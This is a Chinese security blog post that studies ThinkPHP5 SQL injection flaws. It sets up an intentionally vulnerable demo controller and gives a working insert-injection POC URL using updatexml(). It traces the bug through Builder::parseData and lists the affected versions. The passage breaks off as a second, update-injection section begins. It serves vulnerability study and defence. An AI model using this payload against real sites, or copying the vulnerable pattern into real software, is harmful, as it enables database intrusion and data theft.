<!DOCTYPE html>
<html lang="en">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="m0nk3y">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="m0nk3y">
    
    <meta name="keywords" content="信息安全,CTF,攻防对抗,代码审计,安全研究,渗透测试">
    
    <meta name="description" content="">
    <meta name="description" content="[toc] 参考资料：https:&#x2F;&#x2F;github.com&#x2F;Mochazz&#x2F;ThinkPHP-Vuln 环境准备：  PHPStorm + MAMP PRO  环境搭建可以看我前两篇文章。  composer  12brew install composercomposer config -g repo.packagist composer https:&#x2F;&#x2F;mirrors.al">
<meta property="og:type" content="article">
<meta property="og:title" content="ThinkPHP5漏洞学习-SQL注入">
<meta property="og:url" content="https://hack-for.fun/69fea760.html">
<meta property="og:site_name" content="可惜没如果、m0nk3y‘s Blog">
<meta property="og:description" content="[toc] 参考资料：https:&#x2F;&#x2F;github.com&#x2F;Mochazz&#x2F;ThinkPHP-Vuln 环境准备：  PHPStorm + MAMP PRO  环境搭建可以看我前两篇文章。  composer  12brew install composercomposer config -g repo.packagist composer https:&#x2F;&#x2F;mirrors.al">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191229.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191250.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191832.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191848.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192007.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192026.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192043.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192059.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913193005.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192945.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192928.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192915.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192902.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192852.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192749.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192803.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203133.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203118.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914203111.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202218.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202201.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202036.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202026.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914202011.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201959.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201929.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200914201900.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105138.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105308.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105416.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105701.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105718.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105734.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105805.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915105825.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915125740.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190936.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915140312.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190852.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190840.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185921.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185938.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915190030.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915185921.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915191318.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915140312.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916002455.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232420.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232744.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232803.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232824.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232853.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915232946.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233014.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233128.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233201.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200915233944.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916003016.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916004546.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014204.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014143.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014123.png">
<meta property="og:image" content="https://github.com/Ifonly-go2019/ThinkPHP-Vuln/raw/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BSQL%E6%B3%A8%E5%85%A56/7.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200916014204.png">
<meta property="article:published_time" content="2020-09-13T05:40:27.000Z">
<meta property="article:modified_time" content="2020-09-23T03:04:24.409Z">
<meta property="article:author" content="m0nk3y">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191229.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    
    <title>ThinkPHP5漏洞学习-SQL注入 · m0nk3y&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825203605.JPG" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="可惜没如果、m0nk3y‘s Blog" type="application/atom+xml">
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >M0nk3y&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">ThinkPHP5漏洞学习-SQL注入</a>
            </div>
    </div>
    
    <a class="home-link" href=/>M0nk3y's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200825211012.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            ThinkPHP5漏洞学习-SQL注入
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "代码审计">代码审计</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "SQL注入">SQL注入</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">4.7k</span>Reading time: <span class="post-count reading-time">20 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2020/09/13</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>[toc]</p>
<p>参考资料：<a target="_blank" rel="noopener" href="https://github.com/Mochazz/ThinkPHP-Vuln">https://github.com/Mochazz/ThinkPHP-Vuln</a></p>
<p>环境准备：</p>
<ul>
<li>PHPStorm + MAMP PRO</li>
</ul>
<p>环境搭建可以看我前两篇文章。</p>
<ul>
<li>composer</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">brew install composer</span><br><span class="line">composer config -g repo.packagist composer https:&#x2F;&#x2F;mirrors.aliyun.com&#x2F;composer&#x2F;</span><br></pre></td></tr></table></figure>

<ul>
<li>获取复现代码</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project --prefer-dist topthink&#x2F;think&#x3D;5.0.15 tpdemo</span><br></pre></td></tr></table></figure>


<p>将 <strong>composer.json</strong> 文件的 <strong>require</strong> 字段设置成如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;require&quot;: &#123;</span><br><span class="line">    &quot;php&quot;: &quot;&gt;&#x3D;5.4.0&quot;,</span><br><span class="line">    &quot;topthink&#x2F;framework&quot;: &quot;5.0.15&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>SQL 注入demo 环境</li>
</ul>
<p>修改<code>/application/index/controller/index.php</code> 的代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">app</span>\<span class="title">index</span>\<span class="title">controller</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Index</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        $username = request()-&gt;get(<span class="string">&#x27;username/a&#x27;</span>);</span><br><span class="line">        db(<span class="string">&#x27;users&#x27;</span>)-&gt;insert([<span class="string">&#x27;username&#x27;</span> =&gt; $username]);</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Update success&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>模拟这里存在一个用户传参并与数据库交互的场景。</p>
</blockquote>
<p>可能会存在，SQL 报错</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191229.png" alt="image-20200913135221064"></p>
<p>修改username 字段默认为<code>NULL</code>  即可解决问题。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191250.png" alt="image-20200913134825568"></p>
<h1 id="SQL注入一-insert"><a href="#SQL注入一-insert" class="headerlink" title="SQL注入一(insert)"></a>SQL注入一(insert)</h1><h2 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">public&#x2F;index&#x2F;index?username[0]&#x3D;inc&amp;username[1]&#x3D;updatexml(1,concat(0x7,user(),0x7e),1)&amp;username[2]&#x3D;1 </span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191832.png" alt="image-20200913134332556"></p>
<h2 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>5.0.13&lt;=ThinkPHP&lt;=5.0.15</strong> 、 <strong>5.1.0&lt;=ThinkPHP&lt;=5.1.5</strong></p>
<h2 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>本次漏洞存在于 <strong>Builder</strong> 类的 <strong>parseData</strong> 方法中。由于程序没有对数据进行很好的过滤，将数据拼接进 <strong>SQL</strong> 语句，导致 <strong>SQL注入漏洞</strong> 的产生。</p>
<p>类型：<code>insert</code> 注入。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><blockquote>
<p>对于开源项目，在issue 或者 commit \ Releases 记录中，就能找到历史漏洞信息。这一点在CTF中经常用到，尤其是Node.js 的第三方依赖漏洞。</p>
</blockquote>
<p>从漏洞影响版本可以去找 已经修复后的版本，<a target="_blank" rel="noopener" href="https://github.com/top-think/framework/releases/tag/v5.0.16">https://github.com/top-think/framework/releases/tag/v5.0.16</a></p>
<p>通过github 的<code>compare</code>功能，即可查看代码发生了哪些修改。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/top-think/framework/compare/v5.0.16...master">https://github.com/top-think/framework/compare/v5.0.16...master</a></p>
<p>在<code>/thinkphp/library/think/db/Connection.php</code> 的 314， 316 行下断点Debug，打payload。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913191848.png" alt="image-20200913141903209"></p>
<p>INSERT INTO <code>users</code> (<code>username</code>) VALUES (updatexml(1,concat(0x7,user(),0x7e),1)+1) </p>
<p>同时成功攻击的Payload 所在的参数位于 <code>username[1]</code> 的 <code>value</code>  。</p>
<p>攻击Payload 经过ThinkPHP 的内置过滤后，进入<code>$this-&gt;builder</code> 的<code>Query</code> 类的<code>insert</code> 方法，执行其中的SQL语句，并在后面返回出了执行结果。因为Payload利用<code>updatexml()</code>来报错，因此必须开启<code>app_debug</code> 来开启SQL 报错信息。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192007.png" alt="image-20200913155142684"></p>
<p>(如上图debug 结果中Query.php），<code>$this-&gt;builder</code> 为 <code>think\db\builder\Mysql</code> 类，<code>Query</code> 的定义位于 <code>thinkphp/library/think/db/builder/Mysql.php</code> </p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192026.png" alt="image-20200913161424839"></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192043.png" alt="image-20200913161552092"></p>
<p>在<code>/thinkphp/library/think/db/builder/Mysql.php</code> , <code>Mysql</code> 类继承于<code>Builder</code> 类，即上面的 <strong>$this-&gt;builder-&gt;insert()</strong> 最终调用的是 <strong>Builder</strong> 类的 <strong>insert</strong> 方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192059.png" alt="image-20200913162209236"></p>
<p>方法调用<code>parseData()</code>方法来分析并处理数据，跟进该方法。</p>
<p><code>/thinkphp/library/think/db/Builder.php</code> </p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913193005.png" alt="image-20200913163148214"></p>
<p>在<code>inc</code> 和 <code>dec</code> 的 情况下，将可控数据<code>$val[1]</code>通过<code>parseKey</code>方法处理后，进行拼接，并返回<code>$result</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192945.png" alt="image-20200913185951795"></p>
<p><code>parseKey</code>方法 不做任何处理，是直接返回值的一个方法。</p>
<blockquote>
<p>因此，带有恶意SQL 语句的Payload，被拼接且没任何字符串形式处理在Builder类的insert方法中，通过str_replace函数直接替换，返回sql，带入SQL语句中被执行，造成了SQL注入漏洞。</p>
</blockquote>
<p>在<code>thinkphp/library/think/Request.php</code> 中，有调用内置过滤（直接替换为空）方法，对参数<code>exp</code>进行过滤，在case <code>exp</code>的情况下，无法造成漏洞。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192928.png" alt="carbon"></p>
<p>问题：为什么不能将恶意Payload 用<code>username[2]</code> 来投递？</p>
<p>原因：</p>
<p>同样的办法，下断点，debug 可以看到。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192915.png" alt="image-20200913181025221"></p>
<p>回到之前的<code>parseDate</code> 方法，<code>username[2]</code>的值通过<code>floatval</code>函数处理</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192902.png" alt="image-20200913171023035"></p>
<p>payload 变为了<code>0</code> ，且 会存在SQL 错误。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192852.png" alt="image-20200913182241348"></p>
<h2 id="利用总结"><a href="#利用总结" class="headerlink" title="利用总结"></a>利用总结</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192749.png" alt="image-20200913185834897"></p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200913192803.png" alt="image-20200913151252661"></p>
<h1 id="SQL注入二-update"><a href="#SQL注入二-update" class="headerlink" title="SQL注入二(update)"></a>SQL注入二(update)</h1><p>复现代码获取：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">composer create-project --prefer-dist topthink&#x2F;think&#x3D;5.1  tpdemo3</span><br></pre></td></tr></table></figure>

<p>将 <strong>composer.json</strong> 文件的 <strong>require</strong> 字段设置成如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;require&quot;: &#123;</span><br><span class="line">    &quot;php&quot;: &quot;&gt;&#x3D;5.6.0&quot;,</span><br><span class="line">    &quot;topthink&#x2F;framework&quot;: &quot;5.1.7&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在<code>../config/app.php</code> 中，需要修改<code>app_trace</code> 为true， <code>app_debug</code> 默认开启了。</p>
<p>创建数据库：</p>
